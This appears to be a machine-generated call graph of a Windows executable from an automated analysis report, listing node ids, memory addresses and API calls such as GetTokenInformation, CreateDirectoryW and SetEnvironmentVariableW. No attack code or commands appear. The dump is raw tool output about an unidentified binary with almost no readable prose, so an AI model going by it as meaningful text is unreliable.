_invalid_parameter_noinfo 37 API calls 17183->17186 17184->17182 17186->17110 17189->17183 17189->17186 17192 7ff633d8080c WideCharToMultiByte 17190->17192 17194 7ff633d70d53 17193->17194 17195 7ff633d70d41 17193->17195 17197 7ff633d70d60 17194->17197 17201 7ff633d70d9d 17194->17201 17196 7ff633d74f08 _get_daylight 11 API calls 17195->17196 17198 7ff633d70d46 17196->17198 17199 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 17197->17199 17200 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 17198->17200 17205 7ff633d70d51 17199->17205 17200->17205 17202 7ff633d70e46 17201->17202 17203 7ff633d74f08 _get_daylight 11 API calls 17201->17203 17204 7ff633d74f08 _get_daylight 11 API calls 17202->17204 17202->17205 17206 7ff633d70e3b 17203->17206 17207 7ff633d70ef0 17204->17207 17205->17079 17208 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 17206->17208 17209 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 17207->17209 17208->17202 17209->17205 17215 7ff633d7ec3d 17210->17215 17211 7ff633d7ec42 17212 7ff633d751dd 17211->17212 17213 7ff633d74f08 _get_daylight 11 API calls 17211->17213 17212->17054 17212->17061 17214 7ff633d7ec4c 17213->17214 17216 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 17214->17216 17215->17211 17215->17212 17217 7ff633d7ec8c 17215->17217 17216->17212 17217->17212 17218 7ff633d74f08 _get_daylight 11 API calls 17217->17218 17218->17214 17220 7ff633d68633 __std_exception_copy 17219->17220 17221 7ff633d685b1 GetTokenInformation 17219->17221 17223 7ff633d6864c 17220->17223 17224 7ff633d68646 CloseHandle 17220->17224 17222 7ff633d685d2 GetLastError 17221->17222 17225 7ff633d685dd 17221->17225 17222->17220 17222->17225 17223->16201 17224->17223 17225->17220 17226 7ff633d685f9 GetTokenInformation 17225->17226 17226->17220 17227 7ff633d6861c 17226->17227 17227->17220 17228 7ff633d68626 ConvertSidToStringSidW 17227->17228 17228->17220 17230 7ff633d6c850 17229->17230 17231 7ff633d62b74 GetCurrentProcessId 17230->17231 17232 7ff633d626b0 48 API calls 17231->17232 17233 7ff633d62bc7 17232->17233 17234 7ff633d74bd8 48 API calls 17233->17234 17235 7ff633d62c10 MessageBoxW 17234->17235 17236 7ff633d6c550 _log10_special 8 API calls 17235->17236 17237 7ff633d62c40 17236->17237 17237->16212 17239 7ff633d625e5 17238->17239 17240 7ff633d74bd8 48 API calls 17239->17240 17241 7ff633d62604 17240->17241 17241->16227 17287 7ff633d78794 17242->17287 17246 7ff633d681dc 17245->17246 17247 7ff633d69390 2 API calls 17246->17247 17248 7ff633d681fb 17247->17248 17249 7ff633d68216 ExpandEnvironmentStringsW 17248->17249 17250 7ff633d68203 17248->17250 17252 7ff633d6823c __std_exception_copy 17249->17252 17251 7ff633d62810 49 API calls 17250->17251 17253 7ff633d6820f __std_exception_copy 17251->17253 17254 7ff633d68253 17252->17254 17255 7ff633d68240 17252->17255 17256 7ff633d6c550 _log10_special 8 API calls 17253->17256 17259 7ff633d68261 GetDriveTypeW 17254->17259 17260 7ff633d682bf 17254->17260 17257 7ff633d62810 49 API calls 17255->17257 17257->17253 17328 7ff633d81558 17287->17328 17387 7ff633d812d0 17328->17387 17408 7ff633d802d8 EnterCriticalSection 17387->17408 17535 7ff633d6456a 17534->17535 17536 7ff633d69390 2 API calls 17535->17536 17537 7ff633d6458f 17536->17537 17538 7ff633d6c550 _log10_special 8 API calls 17537->17538 17539 7ff633d645b7 17538->17539 17539->16264 17541 7ff633d67e2e 17540->17541 17542 7ff633d61c80 49 API calls 17541->17542 17543 7ff633d67f52 17541->17543 17549 7ff633d67eb5 17542->17549 17544 7ff633d6c550 _log10_special 8 API calls 17543->17544 17545 7ff633d67f83 17544->17545 17545->16264 17546 7ff633d61c80 49 API calls 17546->17549 17547 7ff633d64560 10 API calls 17547->17549 17548 7ff633d67f0b 17550 7ff633d69390 2 API calls 17548->17550 17549->17543 17549->17546 17549->17547 17549->17548 17551 7ff633d67f23 CreateDirectoryW 17550->17551 17551->17543 17551->17549 17553 7ff633d61637 17552->17553 17554 7ff633d61613 17552->17554 17556 7ff633d645c0 108 API calls 17553->17556 17673 7ff633d61050 17554->17673 17558 7ff633d6164b 17556->17558 17557 7ff633d61618 17561 7ff633d6162e 17557->17561 17564 7ff633d62710 54 API calls 17557->17564 17559 7ff633d61653 17558->17559 17560 7ff633d61682 17558->17560 17562 7ff633d74f08 _get_daylight 11 API calls 17559->17562 17563 7ff633d645c0 108 API calls 17560->17563 17561->16264 17565 7ff633d61658 17562->17565 17566 7ff633d61696 17563->17566 17564->17561 17567 7ff633d62910 54 API calls 17565->17567 17568 7ff633d616b8 17566->17568 17569 7ff633d6169e 17566->17569 17570 7ff633d61671 17567->17570 17572 7ff633d706d4 73 API calls 17568->17572 17571 7ff633d62710 54 API calls 17569->17571 17570->16264 17573 7ff633d616ae 17571->17573 17574 7ff633d616cd 17572->17574 17579 7ff633d7004c 74 API calls 17573->17579 17575 7ff633d616f9 17574->17575 17576 7ff633d616d1 17574->17576 17601 7ff633d67144 17600->17601 17603 7ff633d6718b 17600->17603 17601->17603 17737 7ff633d75024 17601->17737 17603->16264 17605 7ff633d641a1 17604->17605 17606 7ff633d644e0 49 API calls 17605->17606 17607 7ff633d641db 17606->17607 17608 7ff633d644e0 49 API calls 17607->17608 17609 7ff633d641eb 17608->17609 17610 7ff633d6420d 17609->17610 17611 7ff633d6423c 17609->17611 17768 7ff633d64110 17610->17768 17612 7ff633d64110 51 API calls 17611->17612 17614 7ff633d6423a 17612->17614 17615 7ff633d6429c 17614->17615 17616 7ff633d64267 17614->17616 17618 7ff633d64110 51 API calls 17615->17618 17775 7ff633d67cf0 17616->17775 17620 7ff633d642c0 17618->17620 17649 7ff633d61c80 49 API calls 17648->17649 17650 7ff633d64474 17649->17650 17650->16264 17674 7ff633d645c0 108 API calls 17673->17674 17675 7ff633d6108c 17674->17675 17676 7ff633d610a9 17675->17676 17677 7ff633d61094 17675->17677 17679 7ff633d706d4 73 API calls 17676->17679 17678 7ff633d62710 54 API calls 17677->17678 17685 7ff633d610a4 __std_exception_copy 17678->17685 17680 7ff633d610bf 17679->17680 17681 7ff633d610e6 17680->17681 17682 7ff633d610c3 17680->17682 17686 7ff633d610f7 17681->17686 17687 7ff633d61122 17681->17687 17683 7ff633d74f08 _get_daylight 11 API calls 17682->17683 17684 7ff633d610c8 17683->17684 17688 7ff633d62910 54 API calls 17684->17688 17685->17557 17689 7ff633d74f08 _get_daylight 11 API calls 17686->17689 17690 7ff633d61129 17687->17690 17698 7ff633d6113c 17687->17698 17738 7ff633d75031 17737->17738 17739 7ff633d7505e 17737->17739 17741 7ff633d74f08 _get_daylight 11 API calls 17738->17741 17749 7ff633d74fe8 17738->17749 17740 7ff633d75081 17739->17740 17743 7ff633d7509d 17739->17743 17742 7ff633d74f08 _get_daylight 11 API calls 17740->17742 17744 7ff633d7503b 17741->17744 17746 7ff633d75086 17742->17746 17752 7ff633d74f4c 17743->17752 17745 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 17744->17745 17748 7ff633d75046 17745->17748 17750 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 17746->17750 17748->17601 17749->17601 17751 7ff633d75091 17750->17751 17751->17601 17753 7ff633d74f6b 17752->17753 17754 7ff633d74f70 17752->17754 17753->17751 17754->17753 17755 7ff633d7b150 __GetCurrentState 45 API calls 17754->17755 17756 7ff633d74f8b 17755->17756 17760 7ff633d7d984 17756->17760 17761 7ff633d7d999 17760->17761 17762 7ff633d74fae 17760->17762 17761->17762 17769 7ff633d64136 17768->17769 17770 7ff633d74984 49 API calls 17769->17770 17771 7ff633d6415c 17770->17771 17832 7ff633d75ec8 17831->17832 17833 7ff633d75eee 17832->17833 17836 7ff633d75f21 17832->17836 17834 7ff633d74f08 _get_daylight 11 API calls 17833->17834 17835 7ff633d75ef3 17834->17835 17837 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 17835->17837 17838 7ff633d75f27 17836->17838 17839 7ff633d75f34 17836->17839 17843 7ff633d64616 17837->17843 17841 7ff633d74f08 _get_daylight 11 API calls 17838->17841 17850 7ff633d7ac28 17839->17850 17841->17843 17843->16289 17863 7ff633d802d8 EnterCriticalSection 17850->17863 18224 7ff633d778f8 18223->18224 18227 7ff633d773d4 18224->18227 18226 7ff633d77911 18226->16299 18228 7ff633d7741e 18227->18228 18229 7ff633d773ef 18227->18229 18237 7ff633d7546c EnterCriticalSection 18228->18237 18230 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 18229->18230 18236 7ff633d7740f 18230->18236 18236->18226 18239 7ff633d6fe43 18238->18239 18240 7ff633d6fe71 18238->18240 18242 7ff633d7a814 _invalid_parameter_noinfo 37 API calls 18239->18242 18241 7ff633d6fe63 18240->18241 18248 7ff633d7546c EnterCriticalSection 18240->18248 18241->16303 18242->18241 18250 7ff633d6caf2 RtlLookupFunctionEntry 18249->18250 18251 7ff633d6cb08 RtlVirtualUnwind 18250->18251 18252 7ff633d6c90b 18250->18252 18251->18250 18251->18252 18253 7ff633d6c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18252->18253 18255 7ff633d645c0 108 API calls 18254->18255 18256 7ff633d61493 18255->18256 18257 7ff633d6149b 18256->18257 18258 7ff633d614bc 18256->18258 18259 7ff633d62710 54 API calls 18257->18259 18260 7ff633d706d4 73 API calls 18258->18260 18261 7ff633d614ab 18259->18261 18262 7ff633d614d1 18260->18262 18261->16345 18263 7ff633d614f8 18262->18263 18264 7ff633d614d5 18262->18264 18267 7ff633d61508 18263->18267 18361 7ff633d66375 18360->18361 18362 7ff633d61c80 49 API calls 18361->18362 18363 7ff633d663b1 18362->18363 18364 7ff633d663ba 18363->18364 18365 7ff633d663dd 18363->18365 18366 7ff633d62710 54 API calls 18364->18366 18367 7ff633d64630 49 API calls 18365->18367 18383 7ff633d663d3 18366->18383 18368 7ff633d663f5 18367->18368 18369 7ff633d66413 18368->18369 18370 7ff633d62710 54 API calls 18368->18370 18371 7ff633d64560 10 API calls 18369->18371 18370->18369 18375 7ff633d6641d 18371->18375 18372 7ff633d6c550 _log10_special 8 API calls 18373 7ff633d6336e 18372->18373 18373->16419 18391 7ff633d66500 18373->18391 18374 7ff633d6642b 18377 7ff633d64630 49 API calls 18374->18377 18375->18374 18376 7ff633d68e80 3 API calls 18375->18376 18376->18374 18383->18372 18540 7ff633d65400 18391->18540 18650 7ff633d7b150 __GetCurrentState 45 API calls 18649->18650 18651 7ff633d7a3e1 18650->18651 18654 7ff633d7a504 18651->18654 18663 7ff633d83650 18654->18663 18689 7ff633d83608 18663->18689 18694 7ff633d802d8 EnterCriticalSection 18689->18694 19104 7ff633d808c8 19105 7ff633d808ec 19104->19105 19108 7ff633d808fc 19104->19108 19106 7ff633d74f08 _get_daylight 11 API calls 19105->19106 19126 7ff633d808f1 19106->19126 19107 7ff633d80bdc 19110 7ff633d74f08 _get_daylight 11 API calls 19107->19110 19108->19107 19109 7ff633d8091e 19108->19109 19111 7ff633d8093f 19109->19111 19235 7ff633d80f84 19109->19235 19112 7ff633d80be1 19110->19112 19115 7ff633d809b1 19111->19115 19117 7ff633d80965 19111->19117 19122 7ff633d809a5 19111->19122 19114 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19112->19114 19114->19126 19119 7ff633d7eb98 _get_daylight 11 API calls 19115->19119 19136 7ff633d80974 19115->19136 19116 7ff633d80a5e 19125 7ff633d80a7b 19116->19125 19133 7ff633d80acd 19116->19133 19250 7ff633d796c0 19117->19250 19123 7ff633d809c7 19119->19123 19121 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19121->19126 19122->19116 19122->19136 19256 7ff633d8712c 19122->19256 19127 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19123->19127 19130 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19125->19130 19131 7ff633d809d5 19127->19131 19128 7ff633d8098d 19128->19122 19135 7ff633d80f84 45 API calls 19128->19135 19129 7ff633d8096f 19132 7ff633d74f08 _get_daylight 11 API calls 19129->19132 19134 7ff633d80a84 19130->19134 19131->19122 19131->19136 19138 7ff633d7eb98 _get_daylight 11 API calls 19131->19138 19132->19136 19133->19136 19137 7ff633d833dc 40 API calls 19133->19137 19145 7ff633d80a89 19134->19145 19292 7ff633d833dc 19134->19292 19135->19122 19136->19121 19139 7ff633d80b0a 19137->19139 19140 7ff633d809f7 19138->19140 19141 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19139->19141 19143 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19140->19143 19144 7ff633d80b14 19141->19144 19143->19122 19144->19136 19144->19145 19146 7ff633d80bd0 19145->19146 19150 7ff633d7eb98 _get_daylight 11 API calls 19145->19150 19148 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19146->19148 19147 7ff633d80ab5 19149 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19147->19149 19148->19126 19149->19145 19151 7ff633d80b58 19150->19151 19152 7ff633d80b69 19151->19152 19153 7ff633d80b60 19151->19153 19155 7ff633d7a4a4 __std_exception_copy 37 API calls 19152->19155 19154 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19153->19154 19156 7ff633d80b67 19154->19156 19157 7ff633d80b78 19155->19157 19162 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19156->19162 19158 7ff633d80c0b 19157->19158 19159 7ff633d80b80 19157->19159 19161 7ff633d7a900 _isindst 17 API calls 19158->19161 19301 7ff633d87244 19159->19301 19164 7ff633d80c1f 19161->19164 19162->19126 19167 7ff633d80c48 19164->19167 19174 7ff633d80c58 19164->19174 19165 7ff633d80bc8 19168 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19165->19168 19166 7ff633d80ba7 19169 7ff633d74f08 _get_daylight 11 API calls 19166->19169 19170 7ff633d74f08 _get_daylight 11 API calls 19167->19170 19168->19146 19172 7ff633d80bac 19169->19172 19171 7ff633d80c4d 19170->19171 19175 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19172->19175 19173 7ff633d80f3b 19177 7ff633d74f08 _get_daylight 11 API calls 19173->19177 19174->19173 19176 7ff633d80c7a 19174->19176 19175->19156 19178 7ff633d80c97 19176->19178 19320 7ff633d8106c 19176->19320 19179 7ff633d80f40 19177->19179 19182 7ff633d80d0b 19178->19182 19185 7ff633d80cbf 19178->19185 19195 7ff633d80cff 19178->19195 19181 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19179->19181 19181->19171 19184 7ff633d80cce 19182->19184 19191 7ff633d7eb98 _get_daylight 11 API calls 19182->19191 19205 7ff633d80d33 19182->19205 19183 7ff633d80dbe 19188 7ff633d80e2e 19183->19188 19193 7ff633d80ddb 19183->19193 19190 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19184->19190 19335 7ff633d796fc 19185->19335 19188->19184 19206 7ff633d833dc 40 API calls 19188->19206 19189 7ff633d7eb98 _get_daylight 11 API calls 19194 7ff633d80d55 19189->19194 19190->19171 19196 7ff633d80d25 19191->19196 19200 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19193->19200 19201 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19194->19201 19195->19183 19195->19184 19341 7ff633d86fec 19195->19341 19202 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19196->19202 19197 7ff633d80cc9 19199 7ff633d74f08 _get_daylight 11 API calls 19197->19199 19198 7ff633d80ce7 19198->19195 19204 7ff633d8106c 45 API calls 19198->19204 19199->19184 19203 7ff633d80de4 19200->19203 19201->19195 19202->19205 19209 7ff633d833dc 40 API calls 19203->19209 19211 7ff633d80dea 19203->19211 19204->19195 19205->19184 19205->19189 19205->19195 19207 7ff633d80e6c 19206->19207 19208 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19207->19208 19210 7ff633d80e76 19208->19210 19213 7ff633d80e16 19209->19213 19210->19184 19210->19211 19212 7ff633d80f2f 19211->19212 19216 7ff633d7eb98 _get_daylight 11 API calls 19211->19216 19214 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19212->19214 19215 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19213->19215 19214->19171 19215->19211 19217 7ff633d80ebb 19216->19217 19218 7ff633d80ecc 19217->19218 19219 7ff633d80ec3 19217->19219 19221 7ff633d80474 37 API calls 19218->19221 19220 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19219->19220 19222 7ff633d80eca 19220->19222 19223 7ff633d80eda 19221->19223 19229 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19222->19229 19224 7ff633d80ee2 SetEnvironmentVariableW 19223->19224 19225 7ff633d80f6f 19223->19225 19226 7ff633d80f27 19224->19226 19227 7ff633d80f06 19224->19227 19228 7ff633d7a900 _isindst 17 API calls 19225->19228 19230 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19226->19230 19231 7ff633d74f08 _get_daylight 11 API calls 19227->19231 19232 7ff633d80f83 19228->19232 19229->19171 19230->19212 19233 7ff633d80f0b 19231->19233 19234 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19233->19234 19234->19222 19236 7ff633d80fb9 19235->19236 19237 7ff633d80fa1 19235->19237 19238 7ff633d7eb98 _get_daylight 11 API calls 19236->19238 19237->19111 19244 7ff633d80fdd 19238->19244 19239 7ff633d7a504 __GetCurrentState 45 API calls 19241 7ff633d81068 19239->19241 19240 7ff633d8103e 19242 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19240->19242 19242->19237 19243 7ff633d7eb98 _get_daylight 11 API calls 19243->19244 19244->19240 19244->19243 19245 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19244->19245 19246 7ff633d7a4a4 __std_exception_copy 37 API calls 19244->19246 19247 7ff633d8104d 19244->19247 19249 7ff633d81062 19244->19249 19245->19244 19246->19244 19248 7ff633d7a900 _isindst 17 API calls 19247->19248 19248->19249 19249->19239 19251 7ff633d796d9 19250->19251 19252 7ff633d796d0 19250->19252 19251->19128 19251->19129 19252->19251 19365 7ff633d79198 19252->19365 19257 7ff633d87139 19256->19257 19258 7ff633d86254 19256->19258 19260 7ff633d74f4c 45 API calls 19257->19260 19259 7ff633d86261 19258->19259 19266 7ff633d86297 19258->19266 19263 7ff633d74f08 _get_daylight 11 API calls 19259->19263 19279 7ff633d86208 19259->19279 19262 7ff633d8716d 19260->19262 19261 7ff633d862c1 19265 7ff633d74f08 _get_daylight 11 API calls 19261->19265 19270 7ff633d87183 19262->19270 19274 7ff633d8719a 19262->19274 19291 7ff633d87172 19262->19291 19264 7ff633d8626b 19263->19264 19267 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 19264->19267 19268 7ff633d862c6 19265->19268 19266->19261 19269 7ff633d862e6 19266->19269 19272 7ff633d86276 19267->19272 19273 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 19268->19273 19275 7ff633d74f4c 45 API calls 19269->19275 19280 7ff633d862d1 19269->19280 19271 7ff633d74f08 _get_daylight 11 API calls 19270->19271 19276 7ff633d87188 19271->19276 19272->19122 19273->19280 19277 7ff633d871b6 19274->19277 19278 7ff633d871a4 19274->19278 19275->19280 19281 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 19276->19281 19283 7ff633d871c7 19277->19283 19284 7ff633d871de 19277->19284 19282 7ff633d74f08 _get_daylight 11 API calls 19278->19282 19279->19122 19280->19122 19281->19291 19285 7ff633d871a9 19282->19285 19588 7ff633d862a4 19283->19588 19597 7ff633d88f4c 19284->19597 19289 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 19285->19289 19289->19291 19290 7ff633d74f08 _get_daylight 11 API calls 19290->19291 19291->19122 19293 7ff633d8341b 19292->19293 19294 7ff633d833fe 19292->19294 19295 7ff633d83425 19293->19295 19637 7ff633d87c38 19293->19637 19294->19293 19296 7ff633d8340c 19294->19296 19644 7ff633d87c74 19295->19644 19297 7ff633d74f08 _get_daylight 11 API calls 19296->19297 19300 7ff633d83411 memcpy_s 19297->19300 19300->19147 19302 7ff633d74f4c 45 API calls 19301->19302 19303 7ff633d872aa 19302->19303 19304 7ff633d872b8 19303->19304 19656 7ff633d7ef24 19303->19656 19659 7ff633d754ac 19304->19659 19308 7ff633d873a4 19311 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19308->19311 19312 7ff633d873b5 19308->19312 19309 7ff633d74f4c 45 API calls 19310 7ff633d87327 19309->19310 19314 7ff633d7ef24 5 API calls 19310->19314 19317 7ff633d87330 19310->19317 19311->19312 19313 7ff633d80ba3 19312->19313 19315 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19312->19315 19313->19165 19313->19166 19314->19317 19315->19313 19316 7ff633d754ac 14 API calls 19318 7ff633d8738b 19316->19318 19317->19316 19318->19308 19319 7ff633d87393 SetEnvironmentVariableW 19318->19319 19319->19308 19321 7ff633d810ac 19320->19321 19328 7ff633d8108f 19320->19328 19321->19321 19322 7ff633d7eb98 _get_daylight 11 API calls 19321->19322 19330 7ff633d810d0 19322->19330 19323 7ff633d81154 19324 7ff633d7a504 __GetCurrentState 45 API calls 19323->19324 19326 7ff633d8115a 19324->19326 19325 7ff633d81131 19327 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19325->19327 19327->19328 19328->19178 19329 7ff633d7eb98 _get_daylight 11 API calls 19329->19330 19330->19323 19330->19325 19330->19329 19331 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19330->19331 19332 7ff633d80474 37 API calls 19330->19332 19333 7ff633d81140 19330->19333 19331->19330 19332->19330 19334 7ff633d7a900 _isindst 17 API calls 19333->19334 19334->19323 19336 7ff633d7970c 19335->19336 19337 7ff633d79715 19335->19337 19336->19337 19681 7ff633d7920c 19336->19681 19337->19197 19337->19198 19342 7ff633d86ff9 19341->19342 19346 7ff633d87026 19341->19346 19343 7ff633d86ffe 19342->19343 19342->19346 19344 7ff633d74f08 _get_daylight 11 API calls 19343->19344 19347 7ff633d87003 19344->19347 19345 7ff633d8706a 19348 7ff633d74f08 _get_daylight 11 API calls 19345->19348 19346->19345 19349 7ff633d87089 19346->19349 19363 7ff633d8705e __crtLCMapStringW 19346->19363 19350 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 19347->19350 19351 7ff633d8706f 19348->19351 19352 7ff633d870a5 19349->19352 19353 7ff633d87093 19349->19353 19354 7ff633d8700e 19350->19354 19355 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 19351->19355 19357 7ff633d74f4c 45 API calls 19352->19357 19356 7ff633d74f08 _get_daylight 11 API calls 19353->19356 19354->19195 19355->19363 19358 7ff633d87098 19356->19358 19359 7ff633d870b2 19357->19359 19360 7ff633d7a8e0 _invalid_parameter_noinfo 37 API calls 19358->19360 19359->19363 19728 7ff633d88b08 19359->19728 19360->19363 19363->19195 19364 7ff633d74f08 _get_daylight 11 API calls 19364->19363 19366 7ff633d791b1 19365->19366 19375 7ff633d791ad 19365->19375 19388 7ff633d825f0 19366->19388 19371 7ff633d791c3 19373 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19371->19373 19372 7ff633d791cf 19414 7ff633d7927c 19372->19414 19373->19375 19375->19251 19380 7ff633d794ec 19375->19380 19377 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19378 7ff633d791f6 19377->19378 19379 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19378->19379 19379->19375 19381 7ff633d79515 19380->19381 19386 7ff633d7952e 19380->19386 19381->19251 19382 7ff633d7eb98 _get_daylight 11 API calls 19382->19386 19383 7ff633d795be 19385 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19383->19385 19384 7ff633d807e8 WideCharToMultiByte 19384->19386 19385->19381 19386->19381 19386->19382 19386->19383 19386->19384 19387 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19386->19387 19387->19386 19389 7ff633d825fd 19388->19389 19390 7ff633d791b6 19388->19390 19433 7ff633d7b224 19389->19433 19394 7ff633d8292c GetEnvironmentStringsW 19390->19394 19395 7ff633d8295c 19394->19395 19396 7ff633d791bb 19394->19396 19397 7ff633d807e8 WideCharToMultiByte 19395->19397 19396->19371 19396->19372 19398 7ff633d829ad 19397->19398 19399 7ff633d829b4 FreeEnvironmentStringsW 19398->19399 19400 7ff633d7d5fc _fread_nolock 12 API calls 19398->19400 19399->19396 19401 7ff633d829c7 19400->19401 19402 7ff633d829d8 19401->19402 19403 7ff633d829cf 19401->19403 19405 7ff633d807e8 WideCharToMultiByte 19402->19405 19404 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19403->19404 19406 7ff633d829d6 19404->19406 19407 7ff633d829fb 19405->19407 19406->19399 19408 7ff633d82a09 19407->19408 19409 7ff633d829ff 19407->19409 19410 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19408->19410 19411 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19409->19411 19412 7ff633d82a07 FreeEnvironmentStringsW 19410->19412 19411->19412 19412->19396 19415 7ff633d792a1 19414->19415 19416 7ff633d7eb98 _get_daylight 11 API calls 19415->19416 19428 7ff633d792d7 19416->19428 19417 7ff633d792df 19418 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19417->19418 19419 7ff633d791d7 19418->19419 19419->19377 19420 7ff633d79352 19421 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19420->19421 19421->19419 19422 7ff633d7eb98 _get_daylight 11 API calls 19422->19428 19423 7ff633d79341 19582 7ff633d794a8 19423->19582 19425 7ff633d7a4a4 __std_exception_copy 37 API calls 19425->19428 19427 7ff633d79377 19431 7ff633d7a900 _isindst 17 API calls 19427->19431 19428->19417 19428->19420 19428->19422 19428->19423 19428->19425 19428->19427 19430 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19428->19430 19429 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19429->19417 19430->19428 19432 7ff633d7938a 19431->19432 19434 7ff633d7b235 FlsGetValue 19433->19434 19435 7ff633d7b250 FlsSetValue 19433->19435 19436 7ff633d7b24a 19434->19436 19438 7ff633d7b242 19434->19438 19437 7ff633d7b25d 19435->19437 19435->19438 19436->19435 19441 7ff633d7eb98 _get_daylight 11 API calls 19437->19441 19439 7ff633d7b248 19438->19439 19440 7ff633d7a504 __GetCurrentState 45 API calls 19438->19440 19453 7ff633d822c4 19439->19453 19443 7ff633d7b2c5 19440->19443 19442 7ff633d7b26c 19441->19442 19444 7ff633d7b28a FlsSetValue 19442->19444 19445 7ff633d7b27a FlsSetValue 19442->19445 19447 7ff633d7b2a8 19444->19447 19448 7ff633d7b296 FlsSetValue 19444->19448 19446 7ff633d7b283 19445->19446 19449 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19446->19449 19450 7ff633d7aef4 _get_daylight 11 API calls 19447->19450 19448->19446 19449->19438 19451 7ff633d7b2b0 19450->19451 19452 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19451->19452 19452->19439 19476 7ff633d82534 19453->19476 19455 7ff633d822f9 19491 7ff633d81fc4 19455->19491 19458 7ff633d7d5fc _fread_nolock 12 API calls 19459 7ff633d82327 19458->19459 19460 7ff633d8232f 19459->19460 19461 7ff633d8233e 19459->19461 19462 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19460->19462 19498 7ff633d8266c 19461->19498 19475 7ff633d82316 19462->19475 19465 7ff633d8243a 19466 7ff633d74f08 _get_daylight 11 API calls 19465->19466 19468 7ff633d8243f 19466->19468 19467 7ff633d82495 19470 7ff633d824fc 19467->19470 19509 7ff633d81df4 19467->19509 19471 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19468->19471 19469 7ff633d82454 19469->19467 19472 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19469->19472 19474 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19470->19474 19471->19475 19472->19467 19474->19475 19475->19390 19477 7ff633d82557 19476->19477 19479 7ff633d82561 19477->19479 19524 7ff633d802d8 EnterCriticalSection 19477->19524 19481 7ff633d825d3 19479->19481 19483 7ff633d7a504 __GetCurrentState 45 API calls 19479->19483 19481->19455 19485 7ff633d825eb 19483->19485 19487 7ff633d7b224 50 API calls 19485->19487 19490 7ff633d82642 19485->19490 19488 7ff633d8262c 19487->19488 19489 7ff633d822c4 65 API calls 19488->19489 19489->19490 19490->19455 19492 7ff633d74f4c 45 API calls 19491->19492 19493 7ff633d81fd8 19492->19493 19494 7ff633d81ff6 19493->19494 19495 7ff633d81fe4 GetOEMCP 19493->19495 19496 7ff633d81ffb GetACP 19494->19496 19497 7ff633d8200b 19494->19497 19495->19497 19496->19497 19497->19458 19497->19475 19499 7ff633d81fc4 47 API calls 